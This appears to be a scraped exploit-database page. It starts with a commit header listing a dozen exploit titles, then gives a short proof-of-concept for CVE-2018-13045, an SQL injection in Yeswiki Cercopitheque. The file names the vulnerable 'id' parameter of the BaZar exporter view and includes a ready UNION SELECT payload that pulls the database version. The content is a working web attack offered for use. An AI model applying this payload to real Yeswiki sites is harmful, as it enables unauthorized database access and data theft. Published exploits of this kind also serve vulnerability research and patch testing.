aedf107ce9
12 changes to exploits/shellcodes MiniShare Server 1.3.2 - Remote Denial of Service MiniShare 1.3.2 - Remote Denial of Service MiniShare 1.5.5 - Local Buffer Overflow (SEH) MiniShare 1.5.5 - 'users.txt' Local Buffer Overflow (SEH) Linux Kernel 4.4 - 'rtnetlink' Stack Memory Disclosure PassFab RAR 9.3.2 - Buffer Overflow (SEH) LanSpy 2.0.1.159 - Local Buffer Overflow PDF Explorer 1.5.66.2 - Buffer Overflow (SEH) MiniShare HTTP 1.5.5 - Remote Buffer Overflow MiniShare 1.5.5 - Remote Buffer Overflow MiniShare 1.4.1 - Remote Buffer Overflow HEAD and POST Method MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow Hotel Booking Script 3.4 - Cross-Site Request Forgery (Change Admin Password) Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit) Integria IMS 5.0.83 - 'search_string' Cross-Site Scripting Integria IMS 5.0.83 - Cross-Site Request Forgery Bolt CMS < 3.6.2 - Cross-Site Scripting Yeswiki Cercopitheque - 'id' SQL Injection IBM Operational Decision Manager 8.x - XML External Entity Injection Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)
19 lines
No EOL
585 B
Text
19 lines
No EOL
585 B
Text
# Exploit Title: SQL Injection in Yeswiki (Cercopitheque)
|
|
# Date: 02/07/2018
|
|
# Exploit Author: Mickael BROUTY (@ark1nar) - FIDENS
|
|
# Vendor Homepage: https://yeswiki.net
|
|
# Software Link: https://repository.yeswiki.net/cercopitheque/yeswiki-cercopitheque-2018-12-07-1.zip
|
|
# Version: Yeswiki Cercopitheque 2018-06-19-1
|
|
# Tested on: Kali linux
|
|
# CVE : CVE-2018-13045
|
|
|
|
|
|
# POC:
|
|
# 1)
|
|
# http://localhost/[PATH]/?BaZar&vue=exporter&id=[SQL]
|
|
#
|
|
|
|
|
|
Exploitation example:
|
|
|
|
http://localhost/[PATH]/?BaZar&vue=exporter&id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15# |